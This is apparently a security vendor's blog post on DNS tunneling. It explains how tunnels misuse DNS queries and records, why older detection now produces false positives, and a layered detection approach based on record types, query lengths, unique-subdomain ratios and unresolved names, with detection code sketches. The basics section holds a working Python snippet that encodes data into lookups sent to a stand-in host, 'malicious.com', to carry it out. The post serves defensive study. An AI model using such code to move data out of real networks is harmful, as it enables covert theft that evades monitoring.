Plight at the end of the tunnel

Editor’s Note: Elastic joined forces with Endgame in October 2019, and has migrated some of the Endgame blog content to elastic.co. See Elastic Security to learn more about our integrated security solutions.

DNS tunneling is a technique that misuses the Domain Name System (DNS) to encode another protocol’s data into a series of DNS queries and response messages. It received a lot of attention a few years ago, when malware families like Feederbot and the Morto worm were discovered using DNS tunneling as a command and control (C&C) channel.

However, as Internet architecture has evolved, many of the techniques that were developed to detect DNS tunnels now create false positives. Evolutionary changes to the Internet, including the widespread use of Content Delivery Networks and unconventional applications of DNS such as reputation/blocklist lookups and telemetry, have made it harder to detect DNS tunnels. Because of these challenges, and given the ongoing popularity of DNS tunnels as an attack vector for data theft, I revisited this topic and recently presented some of the results of my research at BSides Charm. In this blog post, I’ll walk through the basics of DNS tunneling and some challenges with detection, and offer recommendations for detecting these attacks while limiting false positives.

Back to basics

DNS is mainly known for mapping domain names to IP addresses. This is achieved using A and AAAA records for IPv4 and IPv6 addresses, respectively. In addition to these records, DNS also provides a range of other record types for a wide variety of applications. For example, CNAME records are used to create aliases for a domain name, MX records are used to discover mail exchangers, and TXT records are used to exchange arbitrary data associated with the domain.

endgame-plight-tunnel-upstream-data-blog.png

Upstream data in DNS query field and downstream data in DNS response RR fields

Since DNS is such a fundamental protocol, outbound DNS access is enabled in even very restrictive environments. DNS tunneling abuses this ubiquity of DNS to create covert channels for C&C or data exfiltration. DNS tunnels work by sending upstream data in a DNS query field and receiving downstream data in DNS response RR fields.

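A domain name is limited to 255 octets on the wire (253 characters in dotted text form), each label is limited to 63 characters, and hostnames are conventionally restricted to the case-insensitive character set [a-z0-9-]. In order to send binary data upstream via this field, the data must be encoded to meet these requirements. The following code illustrates how upstream data may be encoded.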

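import base64, socket

binary_data = b"data to send upstream"  # placeholder payload
suffix = ".malicious.com"
# Base32 output is A-Z2-7 plus '=' padding; strip the padding and lowercase it.
data = base64.b32encode(binary_data).decode().rstrip("=").lower()
# 253-character name limit, minus the suffix, minus 3 dots between up to four labels.
csize = 253 - len(suffix) - 3
for chunk in (data[i:i+csize] for i in range(0, len(data), csize)):
    labels = [chunk[j:j+63] for j in range(0, len(chunk), 63)]  # 63-char label limit
    fqdn = ".".join(labels) + suffix
    socket.gethostbyname(fqdn)  # one lookup per chunk; the lookup itself carries the data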

The downstream data is sent using various resource records (RRs). Each RR format has a size and character set limitation. PRIVATE and TXT records allow 216 [a-zA-Z0-9-+] characters. CNAME, MX and SRV records carry domain names, so they have the same format as a DNS query. The size and character-set restrictions of each RR type limit the amount of data and the encoding function that can be used. The adversary’s decision to use one RR type over another in a covert channel comes down to stealth versus bandwidth, as data transfer requirements are balanced against the desire to remain undetected.

DNS tunneling has some properties that set it apart from other tunneling techniques like ICMP tunneling:

  1. DNS is ubiquitous. It is enabled even in the most restrictive networks. On airline and hotel WiFi, DHCP and DNS are the two protocols that are usually enabled before all other traffic is restricted behind a paywall.
  2. DNS tunneling is relatively performant. As far as covert tunneling protocols go, DNS tunneling performs well in terms of latency and bandwidth.
  3. It doesn’t require a direct connection between the attacker and the victim. The DNS traffic is usually relayed through a recursive resolver that performs queries iteratively on behalf of the client. Netflow collected on the host will not reveal a direct connection to the attacker.
  4. Upstream-only channels can be very stealthy. If an attacker is only interested in an upstream channel, for example for data exfiltration, the DNS tunnel doesn’t have to use the DNS responses. It may allow all of the DNS queries to fail with NXDOMAIN or FORMERR, and go under the radar of DNS monitoring applications.
  5. Built-in load balancing. Lastly, DNS tunnels don’t have to use a single domain name to exchange traffic. Traffic can be spread over multiple domains sharing the same nameserver. This provides additional stealth and resilience, since no single domain would stand out as an outlier in the network traffic baselines.

The False Positive Challenge

DNS tunnels encode binary data into an ASCII format, which is then transferred as a domain name in a DNS query. Such domain names, generated from encoded binary data, have high entropy. Moreover, in order to achieve high bandwidth, DNS tunnels encode the largest possible chunk of binary data in each packet, yielding large DNS packets. So, given a stream of DNS traffic from a DNS tunnel, one would observe a large number of long subdomains under the registered domain, each with high entropy.

In contrast, web traffic usually consists of domain names that are short, easy to remember, and derived from a spoken language. Therefore, normal DNS traffic is expected to have smaller DNS packets containing domain names with low entropy.
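To make the entropy contrast concrete, here is a minimal sketch of a per-label Shannon entropy calculation. The function name and the two sample labels are illustrative assumptions, not data from the research described here.

```python
import math
from collections import Counter


def shannon_entropy(label: str) -> float:
    """Return the Shannon entropy of a string, in bits per character."""
    if not label:
        return 0.0
    counts = Counter(label)
    total = len(label)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


# Hypothetical labels: a dictionary word and a base32-looking chunk.
for label in ("mail", "mzxw6ytboi4dqmrqgezdgnbvgy3tq"):
    print(label, round(shannon_entropy(label), 2))
```

Note that the maximum possible entropy grows with label length, so in practice entropy is best compared between labels of similar length.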

High entropy, a large number of subdomains, and large packet size may seem like reliable indicators of a DNS tunnel. But that approach now yields an unmanageable volume of false positives.

One of the primary reasons for this is the advent of CDNs (Content Delivery Networks). Consider a domain that is hosted on a large CDN. The content delivery mechanism usually works by creating a CNAME record (i.e., an alias) from each hosted customer domain to a unique, often random-looking subdomain of a CDN domain. The DNS resolution of this CNAME is how the content delivery optimization is actually performed.

endgame-plight-tunnel-dns-baltimore-sun-blog.png

DNS resolution of www.baltimoresun.com

The parallels with a DNS tunnel are easy to see: a large number of subdomains, each with high entropy.

This large number of subdomains may not be limited to a small set of CDN domains. Some services create a large number of sub-domains directly under the customer’s primary registered domain.

endgame-plight-tunnel-dns-toms-hardware-blog.png

One of the many DNS queries generated from browsing www.tomshardware.com

In addition, some services utilize DNS for non-conventional use cases like file/domain reputation lookups, telemetry, etc. Spamhaus provides a DNSBL service to look up the reputation of domains. Team Cymru provides an extensive ASN & BGP peer lookup service over DNS. DNS traffic to these services also yields false positives.

In the past, SOCs have gotten away with reactive whitelisting. But as more and more such services come online, a whitelisting approach just doesn’t scale.

Layered Approach to Detecting DNS Tunnels

Given these challenges, we need a layered approach to sift through DNS traffic, with each layer attacking a particular aspect of a DNS tunnel. The layers fall into two groups: record types and sizes, and access patterns.

RECORD TYPES AND RECORD SIZES

Resource Record types

NULL and Private RR types have very limited valid use cases. The presence of these RRs in DNS traffic should raise an alarm. TXT records have some valid domain-specific use cases. Even so, the number and size of TXT RRs per domain can be used to detect the simplest of DNS tunnels.
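The record-type layer can be sketched roughly as follows. This assumes that "Private" refers to the private-use RR type range (65280 to 65534) in the IANA registry, and that DNS logs have already been parsed into hypothetical `(domain, rtype, rdata_len)` tuples. No alerting thresholds are set, since suitable values depend on the network's own baseline.

```python
from collections import defaultdict

# RR type numbers from the IANA DNS parameters registry.
NULL_TYPE = 10
TXT_TYPE = 16
PRIVATE_USE = range(65280, 65535)  # 65280-65534 inclusive (assumed meaning of "Private")


def suspicious_rr_type(rtype: int) -> bool:
    """Flag RR types that have very few legitimate uses."""
    return rtype == NULL_TYPE or rtype in PRIVATE_USE


def txt_profile(records):
    """Count TXT records and track the largest one, per domain.

    `records` is an iterable of (domain, rtype, rdata_len) tuples.
    """
    profile = defaultdict(lambda: {"count": 0, "max_len": 0})
    for domain, rtype, rdata_len in records:
        if rtype == TXT_TYPE:
            entry = profile[domain]
            entry["count"] += 1
            entry["max_len"] = max(entry["max_len"], rdata_len)
    return dict(profile)
```

Domains whose TXT count or maximum TXT size sits far above the rest of the profile are the candidates worth passing to the next layer.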

Question and RR size

DNS packet size alone is no longer a good indicator of DNS tunnels. Many domains provide a large number of records for redundancy and load balancing. In addition, AAAA resource records are large and can skew the baseline. If we dig deeper into the DNS packet, query length and individual RR size are good features for detection.

In particular, subdomains longer than 180 characters and queries with two or more labels longer than 52 characters should be considered highly suspicious. These thresholds are evident from the following two graphs plotting maximum query length on the x-axis and the frequency of observing that value, expressed on a log scale, on the y-axis. Benign domains are plotted in blue and malicious DNS tunnels are plotted in red.

endgame-plight-tunnel-max-query-len-blog.png

Maximum query length on the x-axis, frequency in log scale on the y-axis
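The two query-length thresholds can be expressed as a small check. This is a sketch under a few assumptions: the registered domain is supplied by the caller (finding it in general requires a public suffix list), the function names are hypothetical, and either condition on its own is treated as suspicious.

```python
def subdomain_of(fqdn: str, registered_domain: str) -> str:
    """Return the part of `fqdn` to the left of `registered_domain`."""
    fqdn = fqdn.rstrip(".").lower()
    registered_domain = registered_domain.rstrip(".").lower()
    if fqdn == registered_domain:
        return ""
    suffix = "." + registered_domain
    if not fqdn.endswith(suffix):
        raise ValueError(f"{fqdn} is not under {registered_domain}")
    return fqdn[: -len(suffix)]


def is_suspicious_query(fqdn, registered_domain,
                        max_subdomain_len=180, long_label_len=52):
    """Apply the subdomain-length and long-label thresholds to one query name."""
    sub = subdomain_of(fqdn, registered_domain)
    long_labels = [label for label in sub.split(".") if len(label) > long_label_len]
    # Assumption: either indicator alone is enough to flag the query.
    return len(sub) > max_subdomain_len or len(long_labels) >= 2


print(is_suspicious_query("www.example.com", "example.com"))
print(is_suspicious_query("a" * 60 + "." + "b" * 60 + ".example.com", "example.com"))
```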

Similarly, the size of individual RRs in each response can be a good indicator of the existence of a DNS tunnel. Consider the following two graphs plotting the maximum RR length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and DNS tunnel domains are plotted in red.

endgame-plight-tunnel-max-record-len-blog.png

Maximum Resource Record length on the x-axis, frequency in log scale on the y-axis

Outliers in the subdomain’s length, number of labels in the subdomain, and maximum resource record length together help narrow down the field to a small set of potential candidates of a DNS tunnel.

ACCESS PATTERNS

Unique subdomains

As mentioned earlier, the number of subdomains per domain doesn’t always indicate a DNS tunnel. You’ll find that CDN domain names (e.g., akamaiedge[.]com) or domains that host their user content on subdomains (e.g., blogspot.com) also create a large number of subdomains. What separates a DNS tunnel domain from other domains that have a large number of subdomains is repeat queries. In particular, subdomains created by DNS tunnels are usually only queried once. Therefore, the ratio of the number of unique subdomains to the total number of queries per domain works as a much better indicator of a DNS tunnel.
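A minimal sketch of that ratio follows, assuming query logs have already been reduced to hypothetical `(registered_domain, fqdn)` pairs. A value near 1.0 means almost every queried name was seen only once.

```python
from collections import defaultdict


def unique_subdomain_ratio(queries):
    """Return unique-names / total-queries for each registered domain.

    `queries` is an iterable of (registered_domain, fqdn) pairs.
    """
    totals = defaultdict(int)
    uniques = defaultdict(set)
    for domain, fqdn in queries:
        totals[domain] += 1
        uniques[domain].add(fqdn.rstrip(".").lower())
    return {domain: len(uniques[domain]) / totals[domain] for domain in totals}


# Hypothetical traffic: a CDN-style domain with repeat lookups, and a
# tunnel-style domain where every name is queried exactly once.
sample = (
    [("cdn.example", "a.cdn.example")] * 3
    + [("cdn.example", "b.cdn.example")]
    + [("tunnel.example", f"chunk{i}.tunnel.example") for i in range(4)]
)
print(unique_subdomain_ratio(sample))
```

The ratio is only meaningful once a domain has accumulated enough queries, so a minimum query count per domain is a sensible precondition before acting on it.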

Loose ends

Lastly, DNS tunnels leave some loose ends. To understand that, let’s consider the response from dig www[.]amazon[.]com:

endgame-plight-tunnel-dns-res-amazon-blog.png

DNS resolution of www.amazon.com

A CNAME record sets another domain as an alias of the queried domain. The new CNAME FQDN may in turn be an alias of a third domain. But, eventually, the alias domain resolves to an IP address, either with an A/AAAA record inserted proactively, or via an explicit query. The DNS query is usually a precursor to an IP connection to the resolved FQDN. The same is true for MX or SRV records. DNS tunnels, on the other hand, don’t have that requirement. There is no intention to ever make an IP connection to the resolved domain name. If we track all RRs for a domain and find that a large number of the names they return are never resolved to an IP address, it is a strong indicator of a potential DNS tunnel.
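One way to track these loose ends is sketched below. It assumes responses have been flattened into hypothetical `(owner, rtype, value)` tuples, where `value` holds only the target name for CNAME, MX, and SRV records. It reports the fraction of returned names that never lead to an A or AAAA record.

```python
NAME_TYPES = {"CNAME", "MX", "SRV"}
ADDRESS_TYPES = {"A", "AAAA"}


def _norm(name: str) -> str:
    return name.rstrip(".").lower()


def unresolved_fraction(records):
    """Fraction of CNAME/MX/SRV targets never resolved to an IP address."""
    aliases = {}          # CNAME owner -> CNAME target
    targets = set()       # every name handed out in a CNAME, MX, or SRV record
    with_address = set()  # names for which an A or AAAA record was observed
    for owner, rtype, value in records:
        owner = _norm(owner)
        if rtype in NAME_TYPES:
            target = _norm(value)
            targets.add(target)
            if rtype == "CNAME":
                aliases[owner] = target
        elif rtype in ADDRESS_TYPES:
            with_address.add(owner)

    def reaches_address(name):
        # Follow the CNAME chain, guarding against alias loops.
        seen = set()
        while name not in with_address:
            if name in seen or name not in aliases:
                return False
            seen.add(name)
            name = aliases[name]
        return True

    if not targets:
        return 0.0
    unresolved = [t for t in targets if not reaches_address(t)]
    return len(unresolved) / len(targets)
```

A CDN-style chain that ends in an address record scores 0.0, while a domain that only ever hands out names nobody resolves scores close to 1.0.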

Conclusion

The ubiquity of DNS makes it easy for an attacker to create DNS tunnels and go undetected under the large volume of DNS logs that an enterprise usually generates. But it isn’t particularly hard to employ the aforementioned techniques to detect DNS tunnels. While DNS tunnels may successfully hide the data in the protocol fields, it is much harder to feign the behavior and access patterns of a benign use of DNS.

Now that we can detect DNS tunnels reliably, it is important to provide a final word on DNS privacy and its implications for DNS tunneling. There has been a lot of interest lately in providing DNS privacy to consumers. Two protocols continue to garner support and widespread deployment: DoH (DNS over HTTPS) and DNS over TLS. These protocols provide confidentiality for DNS lookups to thwart passive inspection. In the future, DNS tunnels may also utilize these protocols to evade detection. In turn, our detection mechanisms will evolve by relying more on access patterns and higher-order behaviors than on packet inspection.